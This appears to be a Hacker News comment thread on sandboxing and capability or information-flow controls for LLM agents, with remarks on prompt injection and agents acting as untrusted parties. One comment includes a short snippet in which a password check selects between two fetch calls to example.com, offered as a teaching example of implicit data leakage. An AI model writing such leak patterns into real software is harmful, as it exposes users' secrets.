by azhenley on 8/30/25, 1:25 PM with 121 comments
by singron on 8/30/25, 6:06 PM
by ayende on 8/30/25, 3:59 PM
For example, in the book-a-ticket scenario - I want it to be able to check a few websites to compare prices, and I want it to be able to pay for me.
I don't want it to decide to send me on a 37-hour trip with three stops because it is $3 cheaper.
Alternatively, I want to be able to look up my benefits status, but the LLM should physically not be able to provide me any details about the benefits status of my coworkers.
That is the _same_ tool call, but in a different scope.
For that matter, if I'm in HR - I _should_ be able to look at the benefits status of employees that I am responsible for, of course, but that creates an audit log, etc.
In other words, it isn't the action that matters, but the intent.
The LLM should be placed in the same box as the user it is acting on behalf of.
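A minimal sketch of what that could look like in practice; benefitsApi and auditLog are hypothetical stand-in services, not anything from the article:

  // Sketch: tool calls execute with the acting user's identity, so the LLM
  // physically cannot fetch data the user could not fetch themselves.
  interface UserContext {
    userId: string;
    directReports: string[]; // employees this user is responsible for
  }

  // Stand-in services so the sketch is self-contained.
  const auditLog = { record: async (entry: object) => console.log("audit", entry) };
  const benefitsApi = { status: async (id: string) => ({ employeeId: id, plan: "tbd" }) };

  async function getBenefitsStatus(ctx: UserContext, employeeId: string) {
    const allowed = employeeId === ctx.userId || ctx.directReports.includes(employeeId);
    if (!allowed) throw new Error("not authorized for this employee");
    await auditLog.record({ actor: ctx.userId, action: "benefits.read", subject: employeeId });
    return benefitsApi.status(employeeId);
  }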
by nhod on 8/30/25, 2:42 PM
And then this post today, which makes a very strong case for it. (Yes, a VM isn’t an entire OS. Yes, it would be lighter weight than a complete OS. Yes, it would be industry-wide. Yes, we’d likely use an existing OS or codebase to start. Yes, nuance.)
by spankalee on 8/30/25, 6:20 PM
The VM analogy is simply insufficient for securing LLM workflows where you can't trust the LLM to do what you told it to with potentially sensitive data. You may have a top-level workflow that needs access to both sensitive operations (network access) and sensitive data (PII, credentials), and an LLM that's susceptible to prompt injection attacks and general correctness and alignment problems. You can't just run the LLM calls in a VM with access to both sensitive operations and data.
You need to partition the workflow, subtasks, operations, and data so that most subtasks have a very limited view of the world, and use information-flow to track data provenance. The hopefully much smaller subset of subtasks that need both sensitive operations and data will then need to be highly trusted and reviewed.
This post does touch on that though. The really critical bit, IMO, is the "Secure Orchestrators" part, and the FIDES paper, "Securing AI Agents with Information-Flow Control" [1].
The "VM" bit is running some task in a highly restricted container that only has access to the capabilities and data given to it. The "orchestrator" then becomes the critical piece that spawns these containers, gives them the appropriate capabilities, and labels the data they produce correctly (taint-tracking: data derived from sensitive data is sensitive, etc.).
They seem on the right track to me, and I know others working in this area who would agree. I think they need a better hook than "VMs for AI" though. Maybe "partitioning" or "isolation" and emphasize the data part somehow.
by eksrow on 8/30/25, 3:07 PM
From the hosting perspective the article talks about, I would worry more about just keeping the AI agent functional/alive in whatever environment it runs in; that alone is a big challenge. Using AI is great, but stability in basically any use case has been rough for me personally.
From a developer perspective I've been using devcontainers with rootless docker via wsl, and while I'm sure there's some malware that can bypass that (where this VM approach would be a lot stronger), I feel a lot safer this way than running things on the host OS. Furthermore, you get benefits like reproducibility and separation of concerns, and whenever the AI screws something up in your environment you can simply rebuild the container.
by bitexploder on 8/30/25, 3:06 PM
by athrowaway3z on 8/30/25, 6:11 PM
We have user accounts, Read/Write/Exec for User/Groups. Read can grant access tokens, which solves temporary and remote requirements. Every other capabilities model can be defined in those terms.
I'd much rather see a simplification of the tools already available than the reinvention of yet another abstract machine / protocol.
I hope we'll eventually get a fundamental shift in the approach to software as a whole. Currently, everybody is still experimenting with building more new stuff, but it is also a great opportunity to re-evaluate and, at acceptable cost, try to strip out all the cruft and reduce something to its simplest form.
For example - I found an MCP server I liked. Told Claude to remove all the MCP stuff and put it into a CLI. Now I can just call that tool (without paying the context cost). Took me 10 minutes. I doubt Claude is smart enough to build it back in without heavy guidance.
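For what it's worth, the end result of that kind of conversion is roughly this shape; searchDocs is a made-up stand-in for whatever the original MCP tool actually did:

  // Sketch: the MCP tool's core logic called straight from argv - no protocol
  // layer, no tool schema sitting in the model's context.
  async function searchDocs(query: string): Promise<string[]> {
    return [`result for: ${query}`]; // stub; the real tool's logic goes here
  }

  const query = process.argv.slice(2).join(" ");
  if (!query) {
    console.error("usage: search-docs <query>");
    process.exit(1);
  }
  searchDocs(query).then((results) => results.forEach((r) => console.log(r)));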
by shwaj on 8/30/25, 3:51 PM
by armcat on 8/30/25, 3:53 PM
by Imustaskforhelp on 8/30/25, 3:04 PM
by shykes on 8/30/25, 6:47 PM
If you're curious to see one real-life implementation of this (I'm sure there are others), we're pretty far along in doing this with Dagger:
- We already had system primitives for running functions in a sandboxed runtime
- We added the ability for functions to 1) prompt LLMs, and 2) pass other functions to the LLMs as callbacks.
- This way, a function can call LLMs and an LLM can call functions, in any permutation.
- This allows exploring the full spectrum from fully deterministic workflows, to autonomous agents, and everything in between - without locking yourself in a particular programming language, library or framework.
- We've also experimented with passing objects to the LLM, and mapping each of the object's methods to a tool call. This opens interesting possibilities, since the objects can carry state - effectively extending the LLM's context from text only, to arbitrary structured data, without additional dependencies like complex databases etc.
Relevant documentation page: https://docs.dagger.io/features/llm
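(Not the actual Dagger API - the docs above are authoritative - but the "functions call the LLM, the LLM calls functions back" loop looks roughly like this; the llm parameter and its complete() shape are invented stand-ins:)

  // Generic sketch of an LLM-with-callbacks loop, not Dagger's interface.
  type Tool = { name: string; run: (args: Record<string, string>) => Promise<string> };

  interface Llm {
    complete(
      prompt: string,
      toolNames: string[]
    ): Promise<{ tool?: string; args?: Record<string, string>; answer?: string }>;
  }

  async function runAgent(prompt: string, tools: Tool[], llm: Llm): Promise<string> {
    let context = prompt;
    for (;;) {
      const step = await llm.complete(context, tools.map((t) => t.name));
      if (step.answer !== undefined) return step.answer; // model finished
      const tool = tools.find((t) => t.name === step.tool);
      if (!tool) throw new Error(`unknown tool: ${step.tool}`);
      const result = await tool.run(step.args ?? {});
      context += `\n[${step.tool}] ${result}`; // feed the callback's result back
    }
  }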
by tritondev on 8/31/25, 3:06 PM
I took a first pass at enumerating some ideas a few weeks ago: https://davehudson.io/blog/2025-08-11
My thought was to try and define this in a slightly more concrete way by thinking about analogies between the way LLMs operate and more conventional OS processes/tasks.
Building some of the core abstractions isn't too hard - I already have one that unifies the chat and tool use interfaces for 8 different LLM backends. That lets tool approvals be managed in a centralized way. I've not yet implemented a capabilities model, but it feels natural, and I worked with one back in the 90s (VSTa, if anyone is interested in historical OSes). A key part will be to allow one LLM to delegate a subset of its current capabilities to another (I already built the delegation tooling).
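For a sense of what that delegation piece could look like (the interface names here are invented, not from the blog post):

  // Sketch: one chat+tool interface over multiple backends, plus delegation of
  // a subset of the parent's capabilities to a sub-agent.
  interface Message { role: "user" | "assistant" | "tool"; content: string }
  interface Capability { name: string } // e.g. "fs.read", "net.fetch"

  interface Backend {
    chat(messages: Message[], allowed: Capability[]): Promise<Message>;
  }

  class Agent {
    constructor(private backend: Backend, private caps: Capability[]) {}

    // A child agent can only receive capabilities the parent already holds.
    delegate(requested: string[]): Agent {
      const granted = this.caps.filter((c) => requested.includes(c.name));
      return new Agent(this.backend, granted);
    }

    send(messages: Message[]): Promise<Message> {
      return this.backend.chat(messages, this.caps);
    }
  }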
by rbren on 8/30/25, 3:06 PM
by jmount on 8/30/25, 5:43 PM
by CuriouslyC on 8/30/25, 6:44 PM
by martini333 on 8/30/25, 4:36 PM
by ilaksh on 8/30/25, 2:57 PM
by perlgeek on 8/30/25, 6:50 PM
From a security perspective, the real problem seems to me to be that LLMs cannot distinguish between instructions and data; I don't see how this proposal even attempts to address this, but then I haven't really understood their problem description (if there was one).
by mehulashah on 8/30/25, 2:30 PM
by zmmmmm on 8/31/25, 12:21 AM
by kingkawn on 8/30/25, 9:49 PM
by liveoneggs on 8/30/25, 3:58 PM
It's just too bad tcl, lua, forth, js, wasm, etc. aren't AI-scale.
by kookamamie on 8/30/25, 6:26 PM
by delduca on 8/30/25, 2:35 PM
by lvl155 on 8/30/25, 4:11 PM
by saagarjha on 8/31/25, 10:18 AM
Really, what you should be looking at is that you've hired a potentially malicious person to do something on your behalf. Obviously if you don't give them access to your tax documents, they can't read your tax documents. But the kinds of tasks you will want this agent to do at some point are to manage your calendar, read your email, perhaps even summarize your finances. There's no VM that somehow patches the Wells Fargo site to only give you your bank statements and not let you send money to people. The idea of trying to "sandbox" this barely even makes sense because we haven't historically tried to isolate this kind of operation. But, as people keep putting models in new places, it's evident that something like that will have to evolve here. And it's definitely not going to be Qubes, or the JVM, or WebAssembly, or the dozen other things that people have been suggesting as solutions to the problem.
by kachapopopow on 8/30/25, 6:41 PM
by polotics on 8/30/25, 6:52 PM
by slashdave on 8/30/25, 6:54 PM
by tylerhou on 8/30/25, 9:28 PM
An operating system (or sandbox, or whatever) is a very large virtual machine, where the "instructions" are the normal CPU instructions plus the set of syscalls. Unfortunately, operating systems today are complicated, hard to understand, and (relatively) hard to modify. For example, there are many different ways to sandbox file system access (chmod, containers, chroot, sandbox-exec on macOS, etc.) and they each have bugs that have turned into "features" or subtle semantics. Plus, they are not available on all operating systems or even on all distributions of the same operating system. And then -- how do filesystem permissions and network permissions interact? Even if both of their semantics are "safe," is the composition of the two safe?
The assumption is: because operating systems are so complex, large, and underspecified, it probably is dangerous for LLMs to interact directly with the underlying operating system. We have observed this empirically: through CVEs in C and C++ code, we know that subtle errors or small differences in semantics can cascade into huge security vulnerabilities.
To address this, the authors propose that LLMs instead interact with a virtual machine where, for example, the semantics of permissions and/or capabilities is well-defined and standardized across different implementations or operating systems. (This is why they mention Java as an analogy -- the JVM gave developers the ability to write code for a vast array of architectures and operating systems without having to think about the underlying implementations.) This standardization makes it easier to understand how exactly an LLM would be allowed to interact with the outside world.
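To make that concrete, a hypothetical standardized interface could define capability composition as a plain set operation, rather than whatever chroot, containers, and sandbox-exec each happen to do (this is my own illustration, not the article's design):

  // Hypothetical sketch: a small, fully specified capability vocabulary where
  // composition is defined once, for every host OS, as intersection.
  type Cap =
    | { kind: "fs.read"; pathPrefix: string }
    | { kind: "net.fetch"; host: string };

  function sameCap(a: Cap, b: Cap): boolean {
    return JSON.stringify(a) === JSON.stringify(b); // structural equality, simplified
  }

  // A subtask gets only what both of its parents would allow - no OS-specific
  // interaction between filesystem and network rules to reason about.
  function compose(a: Cap[], b: Cap[]): Cap[] {
    return a.filter((ca) => b.some((cb) => sameCap(ca, cb)));
  }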
Besides semantic understanding and clarity, there are more benefits to designing a new virtual machine.
- Standardization across multiple model providers (mentioned).
- Better RLHF / constrained generation opportunity than general Bash output.
- Can incorporate advances in programming language theory and design.
For an example of the last point, in recent years, there has been a ton of research on information flow for security and privacy (mentioned in the article). In a programming language that is aware of information flow, I can mark my bank account password as "secret" and the input to all HTTP calls as "public." The type system or some other static analysis can verify that my password cannot possibly affect the input to any HTTP call. This is harder than you think because it depends on control flow! For example, the following program indirectly exfiltrates information about my password:
  if (password.startsWith("hackernews")) {
    fetch("https://example.com/a");
  } else {
    fetch("https://example.com/b");
  }
Obviously, nobody would write that code, but people do write similar code with bugs in e.g. timing attacks.
by mathiaspoint on 8/30/25, 4:44 PM